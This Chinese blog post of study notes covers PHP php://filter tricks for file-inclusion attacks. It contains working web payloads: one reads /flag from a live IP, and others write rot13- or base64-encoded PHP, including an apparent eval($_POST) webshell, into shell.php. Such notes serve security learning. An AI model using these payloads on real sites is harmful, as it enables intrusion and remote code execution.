<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="zhangMini"><title>文件包含（2） · Mini's blog</title><meta name="description" content="php:&amp;#x2F;&amp;#x2F;filter 的其它用法在前面写的文件包含中，对于php:&amp;#x2F;&amp;#x2F;filter的用法也只是使用 convert 过滤器。除此之外还有 string 过滤器，convert.iconv 可以使用
convert.iconv使用方法：
123convert"><meta name="keywords" content="Security, life"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><meta name="generator" content="Hexo 6.3.0"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Mini's blog</a></h3><div class="description"><p>Nothing lasts forever.</p></div></div></div><ul class="social-links"></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a target="_blank" rel="noopener" href="https://www.caicai.me"> CaiCai </a><span>&</span><a target="_blank" rel="noopener" href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">tags</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/favicon.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>文件包含（2）</a></h3></div><div class="post-content"><h1 id="php-x2F-x2F-filter-的其它用法"><a href="#php-x2F-x2F-filter-的其它用法" class="headerlink" title="php:&#x2F;&#x2F;filter 的其它用法"></a>php:&#x2F;&#x2F;filter 的其它用法</h1><p>在前面写的文件包含中，对于php:&#x2F;&#x2F;filter的用法也只是使用 <strong>convert</strong> 过滤器。除此之外还有 <strong>string</strong> 过滤器，<strong>convert.iconv</strong> 可以使用</p>
<h2 id="convert-iconv"><a href="#convert-iconv" class="headerlink" title="convert.iconv"></a>convert.iconv</h2><p>使用方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">convert.iconv.&lt;input-encoding&gt;.&lt;output-encoding&gt;</span><br><span class="line">or</span><br><span class="line">convert.iconv.&lt;input-encoding&gt;/&lt;output-encoding&gt;</span><br></pre></td></tr></table></figure>

<p>如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://43.142.108.183:8085/?url=php://filter/read=convert.iconv.UTF-16BE.UTF-32BE/resource=/flag</span><br></pre></td></tr></table></figure>

<p>PHP支持的部分编码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">UCS-4*</span><br><span class="line">UCS-4BE</span><br><span class="line">UCS-4LE*</span><br><span class="line">UCS-2</span><br><span class="line">UCS-2BE</span><br><span class="line">UCS-2LE</span><br><span class="line">UTF-32*</span><br><span class="line">UTF-32BE*</span><br><span class="line">UTF-32LE*</span><br><span class="line">UTF-16*</span><br><span class="line">UTF-16BE*</span><br><span class="line">UTF-16LE*</span><br><span class="line">UTF-7</span><br><span class="line">UTF7-IMAP</span><br><span class="line">UTF-8*</span><br><span class="line">ASCII*</span><br><span class="line">EUC-JP*</span><br><span class="line">SJIS*</span><br><span class="line">eucJP-win*</span><br><span class="line">SJIS-win*</span><br><span class="line">ISO-2022-JP</span><br><span class="line">ISO-2022-JP-MS</span><br><span class="line">CP932</span><br><span class="line">CP51932</span><br><span class="line">SJIS-mac</span><br><span class="line">SJIS-Mobile#DOCOMO</span><br><span class="line">SJIS-Mobile#KDDI</span><br><span class="line">SJIS-Mobile#SOFTBANK</span><br><span class="line">UTF-8-Mobile#DOCOMO</span><br><span class="line">UTF-8-Mobile#KDDI-A</span><br><span class="line">UTF-8-Mobile#KDDI-B</span><br><span class="line">UTF-8-Mobile#SOFTBANK</span><br><span class="line">ISO-2022-JP-MOBILE#KDDI</span><br></pre></td></tr></table></figure>

<p>在实际的测试过程中，可以构造好url，然后使用burpsuit对 &lt;input-coding&gt;、 &lt;output-coding&gt; 参数部分进行爆破，来查看哪些编码组合可以使用</p>
<h2 id="string"><a href="#string" class="headerlink" title="string"></a>string</h2><ul>
<li>string.rot13</li>
</ul>
<p>等同于用 str_rot13() 函数处理所有的流数据</p>
<p>对字符串执行ROT13转换。通过传递一个经过编码的字符串作为参数，将会得到原始字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">content=php://filter/write=string.rot13|&lt;?cuc cucvasb();?&gt;|/resource=shell.php</span><br><span class="line"></span><br><span class="line">content=php://filter/write=string.rot13/resource=&lt;?cuc cucvasb();?&gt;/../shell.php</span><br></pre></td></tr></table></figure>

<ul>
<li>string.toupper</li>
</ul>
<p>将字符串转化为大写</p>
<ul>
<li>string.tolower</li>
</ul>
<p>将字符串转化为小写</p>
<h2 id="other"><a href="#other" class="headerlink" title="other"></a>other</h2><p>还在网上看到下面这种形式，先记录下来，还没实际用到过</p>
<ul>
<li>convert.quoted-printable-encode 和 convert.quoted-printable-decode</li>
</ul>
<p>使用此过滤器的decode版本等同于用 quoted_printable_decode()函数处理所有的流数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php</span><br><span class="line"></span><br><span class="line">index.php?file2=php://filter/write=convert.base64-encode/resource=test.txt&amp;txt=Qftm     </span><br><span class="line">?filename=php://filter/convert.base64-decode/resource=1.php/content=aPD9waHAgZXZhbCgkX1BPU1RbYV0pOw==</span><br><span class="line">//写入文件</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/woshilnp/article/details/117266628">详解php:&#x2F;&#x2F;filter以及死亡绕过</a></p>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2022-11-21</span><i class="fa fa-tag"></i><a class="tag" href="/tags/web/" title="web">web </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://example.com/2022/11/21/文件包含（2）/,Mini's blog,文件包含（2）,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2022/11/26/file-uploads/" title="Web文件上传">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2022/11/21/flask/" title="flask 注入绕过">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>